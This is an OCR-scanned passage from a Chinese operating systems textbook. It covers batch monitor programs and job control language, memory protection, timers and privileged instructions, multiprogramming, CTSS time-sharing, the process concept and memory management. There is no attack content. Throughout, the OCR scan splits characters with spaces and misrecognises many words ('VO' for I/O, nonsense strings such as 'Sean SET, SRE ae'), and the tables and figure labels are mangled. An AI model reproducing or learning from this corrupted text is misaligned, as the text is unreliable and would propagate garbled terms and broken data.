监控 程序 完成 调度 功能 : 一 批 作业 排队 等 候 , 处 理 器 尽 可 能 迅速 地 执行 作业 , 没有 任何 空闲 
时 间 。 监 控 程 序 还 改善 了 作业 的 准备 时 间 , 每 个 作业 中 的 指令 均 以 一 种 作业 控制 语言 ( Job Control 
Language，JCL ) 的 基本 形式 给 出 。 这 是 一 种 特殊 类 型 的 程序 设计 语言 ， 用 于 为 监控 程序 提供 指 
令 。 举 一 个 简单 的 例子 ， 用 户 提交 一 个 用 FORTRAN 语言 编写 的 程序 以 及 程序 需要 用 到 的 一 些 
数据 ， 所 有 FORTRAN 指令 和 数据 在 一 个 单独 打 孔 的 卡片 中 ,或 者 是 磁带 中 一 个 单独 的 记录 。 
除了 FORTRAN 指令 和 数据 行 ， 作 业 中 还 包括 作业 控制 指令 ， 这 些 指令 以 “$” 符 号 打头 。 作 业 
的 整体 格式 如 下 所 示 : 

$JOB 

$FIN 


FORTRAN 指令 


SEND 

为 执行 这 个 作业 ， 监 控 程 序 读 $FTN 行 ， 从 海量 存储 器 〈 通常 为 磁带 ) 中 载 人 合适 的 语言 
译 器 。 编 译 器 将 用 户 程 序 翻译 成 目标 代码 ， 并 保存 在 内 存 或 海量 存储 器 中 。 如 果 保 存在 内 存 中 ， 
则 操作 称 做 “编译 、 加 载 和 运行 "。 如 果 保 存在 磁带 中 ， 就 需要 $LOAD 指令 。 在 编译 操作 之 后 监 
控 程序 重新 获得 控制 权 ， 此 时 监控 程序 读 $LOAD 指令 , 启动 一 个 加 载 器 , 并 将 控制 权 转 移 给 它 ， 
加 载 器 将 目标 程序 载 人 内 存 〈 在 编译 器 所 占 的 位 置 中 )。 在 这 种 方式 中 ， 有 一 大 段 内 存 可 以 由 不 
同 的 子 系统 共享 ， 但 是 每 次 只 能 运行 一 个 子 系统 。 

在 用 户 程序 的 执行 过 程 中 , 任何 输入 指令 都 会 读 人 一 行 数据 。 用 户 程 序 中 的 输入 指令 导致 调 
用 一 个 输入 例 程 ， 输 入 例 程 是 操作 系统 的 一 部 分 ， 它 检查 输入 以 确保 程序 并 不 是 意外 读 人 一 个 
JCL 行 。 如 果 是 这 样 ， 就 会 发 生 错误 ， 控 制 权 转移 给 监控 程序 。 用 户 作业 完成 后 ， 监 控 程 序 扫 描 
输入 行 ， 直 到 遇 到 下 一 条 JCL 指令 。 因 此 ， 不 管 程序 中 的 数据 行 太 多 或 太 少 ， 系 统 都 受 保护 。 

可 以 看 出 ,监控 程序 或 者 说 批 处 理 操作 系统 ,只 是 一 个 简单 的 计算 机 程序 。 它 依赖 于 处 理 器 

可 以 从 内 存 的 不 同 部 分 取 指 令 的 能 力 ， 以 交替 地 获取 或 释放 控制 权 。 此 外 , 还 考虑 到 了 其 他 硬件 
功能 : 

@ 内 存 保护 : 当 用 户 程序 正在 运行 时 ， 不 能 改变 包含 监控 程序 的 内 存 区 域 。 如 果 试 图 这 样 
做 ， 处 理 器 硬件 将 发 现 错误 ， 并 将 控制 转移 给 监控 程序 ， 监 控 程 序 取 消 这 个 作业 ， 和 输出 
错误 信息 ， 并 载 人 下 一 个 作业 。 

o 定时 器 : 定时 器 用 于 防止 一 个 作业 独占 系统 。 在 每 个 作业 开始 时 ， 设 置 定 时 器 ， 如 果 定 
时 器 时 间 到 ， 用 户 程序 被 停止 ， 控 制 权 返回 给 监控 程序 。 

o 特权 指令 : 某 些 机 器 指令 设计 成 特权 指令 ， 只 能 由 监控 程序 执行 。 如 果 处 理 器 在 运行 一 
个 用 户 程序 时 遇 到 这 类 指令 , 则 会 发 生 错误 , 并 将 控制 权 转 移 给 监控 程序 。LO 指令 属于 
特权 指令 ， 因 此 监控 程序 可 以 控制 所 有 IO 设备 ， 此 外 还 可 以 避免 用 户 程 序 意外 地 读 到 
下 一 个 作业 中 的 作业 控制 指令 。 如果 用 户 程 序 希 望 执行 VO, 它 必须 请 求 监控 程序 为 自己 
执行 这 个 操作 。 

@ 中 断 : 早期 的 计算 机 模型 并 没有 中 断 能 力 。 这 个 特征 使 得 操作 系统 在 让 用 户 程序 放弃 控 
制 权 或 从 用 户 程序 获得 控制 权时 具有 更 大 的 灵活 性 。 | 

内 存 保 护 和 特权 指令 引入 了 操作 模式 的 概念 。 用户 程 序 执行 在 用 户 态 , 在 这 个 模式 下 , 有 些 

内 存 区 域 是 受到 保护 的 ， 特 权 指令 也 不 允许 执行 。 监 控 程 序 运行 在 系统 态 ， 也 可 以 称 为 内 核 态 ， 
在 这 个 模式 下 ， 可 以 执行 特权 指令 ， 而 且 受 保护 的 内 存 区 域 也 是 可 以 访问 的 。 
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当然 ， 没有 这 些 功能 也 可 以 构造 扣 作 系统 。 但 是 ,计算 机 厂 商 很 快 认识 到 这 样 做 会 造成 混乱 
因此 ， 即 使 是 相对 比较 原始 的 批 处 理 操作 系统 也 提供 这 些 硬件 功能 。 
对 批 处 理 操作 系统 来 说 , 用 户 程序 和 监控 程序 交替 执行 。 这 样 做 存在 两 方面 的 缺点 : 一 部 分 内 存 
交付 给 监控 程序 ; 监控 程序 消耗 了 一 部 分 机 器 时 间 。 Sean SET, SRE ae 
开销 ,但 是 简单 的 批 处 理 系统 还 是 提高 了 计算 机 的 利用 率 。. 


2.2.3 ”多 道 程序 设计 批 处 理 系统 


即便 对 由 简单 批 处 理 操作 系统 提供 的 自动 作业 序列 ， 处 理 器 仍然 经 常 是 空 亲 的。 问题 在 于 
VO 设备 相对 于 处 理 器 速度 太 慢 。 图 2.4 详细 列 出 了 一 个 有 代表 性 的 计算 过 程 ， 这 个 计算 过 程 所 
涉及 的 程序 用 于 处 理 一 个 记录 文件 ， 并 且 平 均 每 秒 处 理 100 
条 指令 。 在 这 个 例子 中 , 计算 机 96% 的 时 间 都 是 用 于 等 待 7O 
设备 完成 文件 数据 传送 。 图 2.5a 显示 了 这 种 只 有 一 个 单独 程 
序 的 情况 ， 称 做 单 道 程序 设计 (uniprogramming )。 处 理 器 花 
费 一 定 的 运行 时 间 进 行 计算 , 直到 遇 到 一 个 IO 指令 , 这 时 它 
必须 等 到 这 个 IO 指令 结束 后 才能 继续 进行 。 

这 种 低 效率 是 可 以 避免 的 。 内 存 空间 可 以 保存 操作 系统 Mat BRAD EEA 
《 常 驻 监控 程序 ) 和 一 个 用 户 程序 。 假 设 内 存 空 间 容 得 下 操作 系统 和 两 个 用 户 程序 ， 那 么 当 一 个 
作业 需要 等 待 TO 时 ， 处 理 器 可 以 切换 到 另 一 个 可 能 并 不 在 等 待 UO 的 作业 〈 见 图 2.5b )。 进 一 
步 还 可 以 扩展 存储 器 以 保存 三 个 、 四 个 或 更 多 的 程序 ， 并 且 在 它们 之 间 进 行 切换 ( 见 图 2.50) 
这 种 处 理 称 做 多 道 程序 设计 ( multiprogramming ) 或 多 任务 处 理 (mnultitasking )， 它 是 现代 操作 
系统 的 主要 方案 。 





程序 A 





时 间 


程序 A 





fal 
c) 三 个 程序 的 多 道 程序 设计 
2.5 ”多 道 程序 设计 实例 
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这 里 给 出 一 个 简单 的 例子 来 说 明 多 道 程序 设计 的 好 处 。 考 虑 一 台 计 算 机 , 它 有 250M 字 节 的 
可 用 存储 器 ( 没有 被 操作 系统 使 用 )、 磁 盘 、 终 端 和 打印 机 , 同时 提交 执行 三 个 程序 : JOB1 、JOB2 
和 JOB3， 它 们 的 属性 在 表 2.1 中 列 出 。 假 设 JOB2 和 JOB3 对 处 理 器 只 有 最 低 的 要 求 ，JOB3 还 
要 求 连续 使 用 磁盘 和 打印 机 。 对 于 简单 的 批 处 理 环境 ， 这 些 作 业 将 顺序 执行 。 因 此 ，JOB1 在 5 
分 钟 后 完成 ，JOB2 必须 等 待 到 这 5 分 钟 过 后 ， 然 后 在 这 之 后 15 分 钟 完成 ， 而 JOB3 WIZE 20 分 
钟 后 才 开 始 , 即 从 它 最 初 被 提交 开始 ,30 分 钟 后 才 完 成 。 表 2.2 中 的 单 道 程序 设计 列 出 了 平均 资 
源 利用 率 、 吞 吐 量 和 响应 时 间 ， 图 2.6a 显示 了 各 个 设备 的 利用 率 。 显 然 ， 在 整个 所 需要 的 30 分 
钟 时 间 内 ， 所 有 资源 都 没有 得 到 充分 使 用 。 

现在 假设 作业 在 多 道 程序 操作 系统 下 并 行 运行 。 由 于 作业 间 几 乎 没有 资源 竞争 , 所 有 这 三 个 
作业 都 可 以 在 计算 机 中 同时 存在 其 他 作业 的 情况 下 ， 在 几乎 最 小 的 时 间 内 运行 (假设 JOB2 和 
JOB3 均 分 配 到 了 足够 的 处 理 器 时 间 ， 以 保证 它们 的 输入 和 输出 操作 处 于 活动 状态 )。JOB1 仍然 
需要 5 分 钟 完 成 ， 但 这 个 时 间 末 尾 ，JOB2 也 完成 了 三 分 之 一 ， 而 JOB3 则 完成 了 一 半 。 所 有 这 
三 个 作业 将 在 15 分 钟 内 完成 。 由 图 2.6b 中 的 直方 图 可 获得 表 2.2 中 多 道 程 序 设 计 中 的 那 一 列 数 
据 ， 从 中 可 以 看 出 性 能 的 提高 是 很 明显 的 。 


表 2.1 示例 程序 执行 属性 





类 别 JOB1 JOB2 JOB3 
作业 类 型 KEHA KE VO KE VO 
持续 时 间 5 分 钟 15 分 钟 10 分 钟 
需要 的 内 存 50M 100M 75M 
是 否 需 要 磁盘 E T 是 
是 否 需 要 终端 否 是 否 
是 否 需 要 打印 机 否 5 是 


#22 多 道 程序 设计 中 的 资源 利用 结果 


类 别 单 道 程序 设计 多 道 程 序 设计 
处 理 器 使 用 20% 40% 
存储 器 使 用 33% 67% 
磁盘 使 用 33% 67% 
打印 机 使 用 33% 67% 
总 共 运 行 时 间 30 分 钟 15 分 钟 
吞吐 率 6 个 作业 /小 时 12 个 作业 /小 时 
平均 响应 时 间 18 分 钟 10 分 钟 


和 简单 的 批 处 理 系统 一 样 , 多 道 程序 批 处 理 系 统 必 须 依赖 于 某 些 计 算 机 硬件 功能 , 对 多 道 程 
序 设 计 有 用 的 最 显著 的 辅助 功能 是 支持 IO 中 断 和 直接 存储 器 访问 (DMA ) 的 硬件 。 通 过 中 断 
驱动 的 VO 或 DMA， 处 理 器 可 以 为 一 个 作业 发 出 IO 命令 ， 当 设备 控制 器 执行 VO 操作 时 ， 处 
理 器 执行 另 一 个 作业 ; 当 IO 操作 完成 时 ， 处 理 器 被 中 断 ,， 控制 权 被 传递 给 操作 系统 中 的 中 断 处 
理 程序 ， 然 后 操作 系统 把 控制 权 传递 给 另 一 个 作业 。 

多 道 程序 操作 系统 比 单个 程序 或 单 道 程序 系统 相对 要 复杂 一 些 。 对 准备 运行 的 多 个 作业 ， 
它们 必须 保留 在 内 存 中 ,这 就 需要 内 存 管 理 (memory management )。 此 外 ， 如果 多 个 作业 都 准 
备 运行 ,处 理 器 必须 决定 运行 哪 一 个 ,这 需要 某 种 调度 算法 。 这 些 概念 将 在 本 章 后 面部 分 详细 
讲述 。 





a) 单 道 程 序 设 计 b) 多 道 程序 设计 
图 2.6 利用 率直 方 图 


2.2.4 分 时 系统 


通过 使 用 多 道 程序 设计 , 可 以 使 批 处 理 变 得 更 加 有 效 。 但是, 对 许多 作业 来 说 , 需要 提供 一 
种 模式 , 以 使 用 户 可 以 直接 与 计算 机 交互 。 KRE, 对 一 些 作 业 如 事务 处 理 , 交互 模式 是 必需 的 。 

当今 , 通常 使 用 专用 的 个 人 计算 机 或 工作 站 来 完成 交互 式 计算 任务 , 但 这 在 20 世纪 60 年 代 
却 是 行 不 通 的 ， 当 时 大 多 数 计算 机 都 非常 庞大 而 且 昂 贵 ， 因 而 分 时 系统 应 运 而 生 。 

正如 多 道 程 序 设计 允许 处 理 器 同时 处 理 多 个 批 作 业 一 样 ， 它 还 可 以 用 于 处 理 多 个 交互 作业 。 
对 后 一 种 情况 ， 由 于 多 个 用 户 分 享 处 理 器 时 间 ， 因 而 该 技术 称 做 分 时 〈time sharing )。 在 分 时 系 
SP, 多 个 用 户 可 以 通过 终端 同时 访问 系统 , 由 操作 系统 控制 每 个 用 户 程序 以 很 短 的 时 间 为 单位 
交替 执行 。 因 此 ， 如 果 有 “个 用 户 同 时 请 求 服务 , 若 不 计 操 作 系 统 开销 ,每 个 用 户 平均 只 能 得 到 
计算 机 有 效 速度 的 1/n。 但 是 由 于 人 的 反应 时 间 相 对 比较 慢 ， 所 以 一 个 设计 良好 的 系统 ， 其 响应 
时 间 应 该 可 以 接近 于 专用 计算 机 。 

批 处 理 和 分 时 都 使 用 了 多 道 程序 设计 ， 其 主要 差别 如 表 2.3 所 示 。 

第 一 个 分 时 操作 系统 是 由 麻 省 理工 学 院 (MIT ) 开发 的 兼容 分 时 系统 (Compatible Time- 
Sharing System, CTSS ) [ CORB62 ]， 源 于 多 路 存 取 计算 机 项 目 ( Machine-Aided Cognition 或 
Multiple-Access Computers, Project MAC), 该 系统 最 初 是 在 1961 FH IBM 709 FAW, BRN 
移植 到 IBM 7094 中 。 


R23 批 处 理 多 道 程序 设计 和 分 时 的 比较 


批 处 理 多 进程 序 设计 
充分 使 用 处 理 器 


作业 提供 的 作业 

控制 语言 命令 

与 后 来 的 系统 相 比 ，CTSS 是 相当 原始 的 。 该 系统 运行 在 一 台 内 存 为 32 000 个 36 位 字 的 机 

器 上 ， 常 驻 监 控 程 序 占 用 了 5000 个 。 当 控制 权 被 分 配给 一 个 交互 用 户 时 ， 该 用 户 的 程序 和 数据 















减 小 响应 时 间 


操作 系统 指令 源 从 终端 键 人 的 命令 
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被 载 人 到 内 存 剩 余 的 27 000 个 字 的 空间 中 。 程 序 通常 在 第 5000 个 字 单 元 处 开始 被 载 人 ,这 简化 
了 监控 程序 和 内 存 管理 。 系 统 时 钟 以 大 约 每 0.2 秒 一 个 的 速度 产生 中 断 ， 罕 每 个 时 圳 中 断 处 ， 操 
作 系统 恢复 控制 权 , 并 将 处 理 器 分 配给 另 一 位 用 户 。 因 此 , AREA RA, SRA ee 
夺 ， 男 一 个 用 户 被 载 信 。 这 项 技术 称 为 时 间 片 (time slicing) 技术 。 为 了 以 后 便于 恢复 ， 保 留 老 
的 用 户 程序 状态 ， 在 新 的 用 户 程序 和 数据 被 读 人 之 前 , 老 的 用 户 程序 和 数据 被 写 出 到 磁盘 。 随后 ， 
当 获 得 下 一 次 机 会 时 ， 老 的 用 户 程序 代码 和 和 数据 被 恢复 到 内 存 中 。 ， 
”为 减 小 磁盘 开销 ， 只 有 当 新 来 的 程序 需要 重 写 用 户 存储 空间 时 , 用 户 存储 空间 才 被 写 出 。 这 

个 原理 如 图 2.7 所 示 。 假 设 有 4 个 交互 用 户 ， 其 存储 器 需求 如 下 : 

© JOB1: 15 000 

@ JOB2: 20 000 

@ JOB3: 5000 

@ JOB4: 10 000 l ` 

RI, 监控 程 序 载 人 JOB1 并 把 控制 权 转 交 给 它 ， 如 图 2.7a 所 示 。 稍 后 ,监控 程序 决定 把 控 
制 权 转交 给 JOB2 ,由 于 JOB2 H JOB1 需要 更 多 的 存储 空间 ,JOB1 必须 先 被 写 出 ,然后 载 人 JOB2， 
如 图 2.7b 所 示 。 接 下 来 ，JOB3 被 载 人 并 运行 , 但 是 由 于 JOB3 比 JOB2 小 ，JOB2 的 一 部 分 仍然 
留 在 存储 器 中 ， 以 减少 写 磁 盘 的 时 间 ， 如 图 2.7c 所 示 。 稍 后 ， 监 控 程 序 决定 把 控制 交 回 JOB1， 
当 JOB1 载 人 存储 器 时 ，JOB2 的 另外 一 部 分 将 被 写 出 ， 如 图 2.74 所 示 。 当 载 人 JOB4 时 ，JOB1 
的 一 部 分 和 JOB2 的 一 部 分 仍 留 在 存储 器 中 , 如 图 2.7e 所 示 。 此 时 ， 如果 JOB1 或 JOB2 被 激活 ， 
则 只 需要 载 人 一 部 分 。 在 这 个 例子 中 是 JOB. 接着 运行 ， 这 就 要 求 JOB4 和 JOB! 留 在 存储 器 中 
的 那 一 部 分 被 写 出 ， 然 后 读 人 JOB2 的 其 余部 分 ， 如 图 2.7f 所 示 。 . 

















图 2.7 CTSS 操作 


与 当今 的 分 时 系统 相 比 ，CTSS 是 一 种 原始 的 方法 ， 但 它 可 以 工作 。 它 非常 简单 ， 从 而 使 监 
控 程序 最 小 。 由 于 一 个 作业 经 常 被 载 人 到 存储 器 中 相同 的 单元 ,因而 在 载 人 时 不 需要 重 定位 技术 
(在 后 面 讲述 )。 这 个 技术 仅仅 写 出 必须 的 内 容 ， 可 以 减少 磁盘 的 活动 。 在 7094 上 运行 时 ，CTSS 
最 多 可 支持 32 个 用 户 。 

分 时 和 多 道 程序 设计 引发 了 操作 系统 中 的 许多 新 闻 题 。 如 果 内 存 中 有 多 个 作业 , 必须 保护 它 
们 不 相互 干扰 ， 例 如 不 会 修改 其 他 作业 的 数据 。 有 多 个 交互 用 户 时 ， 必 须 对 文件 系 绕 进 行 保护 ， 
只 有 授权 用 户 才 可 以 访问 某 个 特定 的 文件 , 还 必须 处 理 资 源 ( 如 打印 机 和 海量 存储 器 ) 帝 争 问题 。 
在 本 书 中 会 经 常 遇 到 这 样 或 那样 的 问题 以 及 可 能 的 解决 方法 。 
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23 主要 的 成 就 


操作 系统 是 最 复杂 的 软件 之 一 ， 这 反映 在 为 了 达到 那些 困难 的 甚至 相互 冲突 的 目标 (方便 、 
有 效 和 易 扩 展 性 ) 而 带 来 的 挑战 上 。[ DENN80a ] 提出 在 操作 系统 开发 中 的 5 个 重要 的 理论 进展 : 
进程 、 内 存 管理 、 信 息 保护 和 安全 、 调 度 和 资源 管理 、 系 统 结构 。 

每 个 进展 都 是 为 了 解决 实际 的 难题 , 并 由 相关 原理 或 抽象 概念 来 描述 的 。 这 5 个 领域 包括 了 
现代 操作 系统 设计 和 实现 中 的 关键 问题 。 本 节 给 出 对 这 5 个 领域 的 简单 回顾 , 也 可 作为 本 书 其 余 
部 分 的 综述 。 


2.3.1 进程 


进程 的 概念 是 操作 系统 结构 的 基础 ，Multics 的 设计 者 在 20 世纪 60 年 代 首 次 使 用 了 这 个 术 
语 [ DALE68 ]， 它 比 作 业 更 通用 一 些 。 存 在 很 多 关于 进程 的 定义 ， 如 下 所 示 : 

@ 一 个 正在 执行 的 程序 。 

@ 计算 机 中 正在 运行 的 程序 的 一 个 实例 。 

@ 可 以 分 配给 处 理 器 并 由 处 理 器 执行 的 一 个 实体 。 

e 由 单一 的 顺序 的 执行 线程 、 一 个 当前 状态 和 一 组 相关 的 系统 资源 所 描述 的 活动 单元 。 
后 面 将 会 对 这 个 概念 进行 更 清晰 的 阐述 。 

计算 机 系统 的 发 展 有 三 条 主线 : 多 道 程序 批 处 理 操 作 、 分 时 和 实时 事务 系统 , 它们 在 时 间 安 
排 和 同步 中 所 产生 的 问题 推动 了 进程 概念 的 发 展 。 正如 前 面 所 讲 的 , 多 道 程序 设计 是 为 了 让 处 理 
器 和 IO 设备 (包括 存储 设备 ) 同时 保持 忙 状 态 ， 以 实现 最 大 效率 。 其 关键 机 制 是 : 在 响应 表示 
IO 事务 结束 的 信号 时 ， 操 作 系 统 将 对 内 存 中 驻 留 的 不 同 程序 进行 处 理 器 切换 。 

发 展 的 第 二 条 主线 是 通用 的 分 时 。 其 主要 设计 目标 是 能 及 时 响应 单个 用 户 的 要 求 , 但 是 由 于 
成 本 原因 ， 又 要 可 以 同时 支持 多 个 用 户 。 由 于 用 户 反应 时 间 相 对 比较 慢 , 这 两 个 目标 是 可 以 同时 
实现 的 。 例 如 ， 如 果 一 个 典型 用 户 平 均 需 要 每 分 钟 2 秒 的 处 理 时 间 ， 则 可 以 有 近 30 个 这 样 的 用 
户 共享 同一 个 系统 , 并 且 感 觉 不 到 互相 的 于 扰 。 当 然 , 在 这 个 计算 中 , 还 必须 考虑 操作 系统 的 开 
销 因 素 。 

发 展 的 另 一 个 重要 主线 是 实时 事务 处 理 系统 。 在 这 种 情况 下 , 很 多 用 户 都 在 对 数据 库 进行 查 
询 或 修改 , 例如 航空 公司 的 预订 系统 。 事务 处 理 系统 和 分 时 系统 的 主要 差别 在 于 前 者 局 限于 一 个 
或 几 个 应 用 , 而 分 时 系统 的 用 户 可 以 从 事 程 序 开发 、 作 业 执 行 以 及 使 用 各 种 各 样 的 应 用 程序 。 对 
于 这 两 种 情况 ， 系 统 响应 时 间 都 是 最 重要 的 。 

系统 程序 员 在 开发 早期 的 多 道 程序 和 多 用 户 交 互 系 统 时 使 用 的 主要 工具 是 中 断 。 一 个 已 定义 
事件 (如 IO 完成 ) 的 发 生 可 以 暂停 任何 作业 的 活动 。 处 理 器 保存 某 些 上 下 文 ( 如 程序 计数 器 和 
其 他 寄存 器 )， 然 后 跳 转 到 中 断 处 理 程序 中 ， 处 理 中 断 ， 然 后 恢复 用 户 被 中 断 作业 或 其 他 作业 的 
处 理 。 

设计 出 一 个 能 够 协调 各 种 不 同 活动 的 系统 软件 是 非常 困难 的 。 在 任何 时 刻 都 有 许多 作业 在 运 
行 中 , 每 个 作业 都 包括 要 求 按 顺 序 执行 的 很 多 步骤 ,因此 , 分析 事件 序列 的 所 有 组 合 几 乎 是 不 可 
能 的 。 由 于 缺乏 能 够 在 所 有 活动 中 进行 协调 和 合作 的 系统 级 的 方法 , 程序 员 只 能 基于 他 们 对 操作 
系统 所 控制 的 环境 的 理解 , 采用 自己 的 特殊 方法 。 然 而 这 种 方法 是 很 脆弱 的 , 尤其 对 于 一 些 程序 
设计 中 的 小 错误 , 因为 这 些 错误 只 有 在 很 少见 的 事件 序列 发 生 时 才 会 出 现 。 由 于 需要 从 应 用 程序 
软件 错误 和 硬件 错误 中 区 分 出 这 些 错误 ， 因 而 诊断 工作 是 很 困难 的 。 即 使 检测 出 错误 ， 也 很 难 确定 
其 原因 , 因为 很 难 再 现 错误 产生 的 精确 场景 。 一 般 而 言 , 产生 这 类 错误 有 4 个 主要 原因 [ DENN80a ]: 
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@ 不 正确 的 同步 : 常常 会 出 现 这 样 的 情况 ， 即 一 个 例 程 必须 挂 起 ， 等 待 系统 中 其 他 地 方 的 
某 一 事件 。 例 如 ， 一 个 程序 启动 了 一 个 VO 读 操 作 ， 在 继续 进行 之 前 必须 等 到 缓冲 区 中 
有 数据 。 在 这 种 情况 下 ， 需 要 来 自 其 他 例 程 的 一 个 信号 ， 而 设计 不 正确 的 信号 机 制 可 能 
导致 信号 丢失 或 接收 到 重复 信号 。 

@ 失败 的 互 斥 : 常常 会 出 现 多 个 用 户 或 程序 试图 同时 使 用 一 个 共享 资源 的 情况 。 例 如 ， 两 

个 用 户 可 能 试图 同时 编辑 一 个 文件 。 如 果 不 控 制 这 种 访问 ， 就 会 发 生 错误 。 因 此 必须 有 
某 种 互 斥 机 制 ， 以 保证 一 次 只 允许 一 个 例 程 对 一 部 分 数据 执行 事务 处 理 。 很 难 证 明 这 类 
互 斥 机 制 的 实现 对 所 有 可 能 的 事件 序列 都 是 正确 的 。 

@ 不 确定 的 程序 操作 : 一 个 特定 程序 的 结果 只 依赖 于 该 程序 的 输入 ， 而 并 不 依赖 于 共享 系 
统 中 其 他 程序 的 活动 。 但 是 ， 当 程序 共享 内 存 并 且 处 理 器 控制 它们 交错 执行 时 ， 它 们 可 
能 会 因为 重 写 相同 的 内 存 区 域 而 发 生 不 可 预测 的 相互 和 干扰。 因此， 程序 调度 顺序 可 能 会 
影响 某 个 特定 程序 的 输出 结果 。 

o TH: 很 可 能 有 两 个 或 多 个 程序 相互 挂 起 等 待 。 例 如 ， 两 个 程序 可 能 都 需要 两 个 WO 设 

备 执行 一 些 操 作 ( 如 从 磁盘 复制 到 磁带 )。 一 个 程序 获得 了 一 个 设备 的 控制 权 ， 而 另 一 个 
程序 获得 了 另 一 个 设备 的 控制 权 ， 它 们 都 等 待 对 方 释放 自己 想 要 的 资源 。 这 样 的 死 锁 依 
赖 于 资源 分 配 和 释放 的 时 机 安排 。 

解决 这 些 问 题 需 要 一 种 系统 级 的 方法 监控 处 理 器 中 不 同 程序 的 执行 .进程 的 概念 为 此 提供 了 
基础 。 进 程 可 以 看 做 是 由 三 部 分 组 成 的 : 

o 一 段 可 执行 的 程序 

o 程序 所 需要 的 相关 数据 ( 变量 、 工 作 空 间 、 缓 冲 区 等 ) 

@ 程序 的 执行 上 下 文 

最 后 一 部 分 是 根本 。 执 行 上 下 文 (execution context ) 又 称 做 进程 状态 ( process state )， 是 操 
作 系 统 用 来 管理 和 控制 进程 所 需 的 内 部 数据 。 这 种 内 部 信息 和 进程 是 分 开 的 , 因为 操作 系统 信息 
不 允许 被 进程 直接 访问 。 上 下 文 包括 操作 系统 管理 进程 以 及 处 理 器 正确 执行 进程 所 需要 的 所 有 信 
息 。 包括 了 各 种 处 理 器 寄存 器 的 内 容 ， 如 程序 计数 器 和 数据 寄存 器 。 它 还 包括 操作 系统 使 用 的 信 
息 ， 如 进程 优先 级 以 及 进程 是 否 在 等 待 特 定 VO 事件 的 完成 。 

图 2.8 给 出 了 一 种 进程 管理 的 方法 。 两 个 进程 A 和 B， 存 在 于 内 存 的 某 些 部 分 。 也 就 是 说 ， 
给 每 个 进程 (包含 程序 、 数 据 和 上 下 文 信息 ) 分 配 一 块 存储 器 区 域 , 并 且 在 由 操作 系统 建立 和 维 
护 的 进程 表 中 进行 记录 。 进程 表 包 含 记录 每 个 进程 的 表 项 , 表 项 内 容 包 括 指向 包含 进程 的 存储 块 
地 址 的 指针 , 还 包括 该 进程 的 部 分 或 全 部 执行 上 下 文 。 执 行 上 下 文 的 其 余部 分 存放 在 别处 ,可 能 
和 进程 自己 保存 在 一 起 ( 如 图 2.8 所 示 )， 通 常 也 可 能 保存 在 内 存 里 一 块 独立 的 区 域 中 。 进 程 索 
引 寄 存 器 ( process index register) 包含 当前 正在 控制 处 理 器 的 进程 在 进程 表 中 的 索引 。 程 序 计 数 
器 指向 该 进程 中 下 一 条 待 执行 的 指令 。 基 址 寄存 器 (base register) 和 界限 寄存 器 (limit register ) 
定义 了 该 进程 所 占据 的 存储 器 区 域 : 基 址 寄存 器 中 保存 了 该 存储 器 区 域 的 开始 地 址 , 界限 寄存 器 
中 保存 了 该 区 域 的 大 小 ( 以 字 节 或 字 为 单位 )。 程 序 计数 器 和 所 有 的 数据 引用 相对 于 基 址 寄存 器 
被 解释 ， 并 且 不 能 超过 界限 寄存 器 中 的 值 ， 这 就 可 以 保护 内 部 进程 间 不 会 相互 干涉 。 

在 图 2.8 中 ， 进 程 索 引 寄 存 器 表明 进程 B 正在 执行 。 以 前 执行 的 进程 被 临时 中 断 , 在 A 中 
断 的 同时 , 所 有 寄存 器 的 内 容 被 记录 在 它 的 执行 上 下 文 环境 中 , 以 后 操作 系统 就 可 以 执行 进程 切 
K, 恢复 进程 A 的 执行 。 进 程 切换 过 程 包括 保存 B 的 上 下 文 和 恢复 A 的 上 下 文 。 当 在 程序 计数 
器 中 载 人 指向 A 的 程序 区 域 的 值 时 ， 进 程 A 自动 恢复 执行 。 
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图 2.8 典型 的 进程 实现 方法 


因此 ,进程 被 当做 数据 结构 来 实现 。 一 个 进程 可 以 是 正在 执行 , 也 可 以 是 等 待 执 行 。 任 何 时 
候 整 个 进程 状态 都 包含 在 它 的 上 下 文 环 境 中 。 这 个 结构 使 得 可 以 开发 功能 强大 的 技术 , 以 确保 在 
进程 中 进行 协调 和 合作 。 在 操作 系统 中 可 能 会 设计 和 并 人 一 些 新 的 功能 ( 如 优先 级 }， 这 可 以 通 
过 扩展 上 下 文 环境 以 包括 支持 这 些 特征 的 新 信息 。 在 本 书 中 ,将 有 很 多 关于 使 用 进程 结构 解决 在 
多 道 程 序 设计 和 资源 共享 中 出 现 的 问题 的 例子 。 


23.2 “内存 管理 


通过 支持 模块 化 程序 设计 的 计算 环境 和 数据 的 灵活 使 用 ， 用 户 的 要 求 可 以 得 到 很 好 的 满足 。 
系统 管理 员 需 要 有 效 自 有 条 理 地 控制 存储 器 分 配 。 操 作 系统 为 满足 这 些 要求 , 担负 着 5 个 基本 的 
存储 器 管理 责任 : 
o 进程 隔离 操作 系统 必须 保护 独立 的 进程， 防止 互相 干涉 各 自 的 存储 空间 ， 包 括 数据 和 
指令 
o 自动 分 配 和 管理 : 程序 应 该 根据 需要 在 存储 层次 间 动 态 地 分 配 ,分 配对 程序 员 是 透明 的 。 
因此 ， 程 序 员 无 需 关心 与 存储 限制 有 关 的 问题 ， 操 作 系统 有 效 地 实现 分 配 间 题 ， 可 以 仅 
在 需要 时 才 给 作业 分 配 存储 空间 。 
支持 模块 化 程序 设计 ， 程 序 员 应 该 能 够 定义 程序 模块 ， 并 且 动态 地 创建 、 ms, 3 
态 地 改变 模块 大 小 。 
o 保护 和 访问 控制 。 不 论 在 存储 层 次 中 的 哪 -级 ， 存 傅 拓 的 共 训 都 会 产生 一 个 程序 访问 史 
一 个 程序 存储 空间 的 潜在 可 能 性 。 当 一 个 特定 的 应 用 程序 需要 共享 时 ， 这 是 可 取 的 。 但 
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在 别 的 时 候 ， 它 可 能 威胁 到 程序 的 完整 性 ， 甚 至 威胁 到 操作 系统 自身 。 操 作 系统 必须 允 
许 一 部 分 内 存 可 以 由 各 种 用 户 以 各 种 方式 进行 访问 。 

© 长 期 存储 : 许多 应 用 程序 需要 在 计算 机 关机 后 长 时 间 保 存 信息 。 

在 典型 情况 下 , 操作 系统 使 用 虚拟 存储 器 和 文件 系统 机 制 来 满足 这 些 训 求 。 文 件 系 统 实现 了 
长 期 存储 ， 它 在 一 个 有 名 字 的 对 象 中 保存 信息 ， 这 个 对 象 称 做 文件 。 对 程序 员 来 说 ,文件 是 一 个 
很 方便 的 概念 ; 对 操作 系统 来 说 ， 文 件 是 访问 控制 和 保护 的 一 个 有 用 单元 。 

虚拟 存储 器 机 制 允 许 程 序 从 逻辑 的 角度 访问 存储 器 , 而 不 考虑 物理 内 存 上 可 用 的 空间 数量 。 
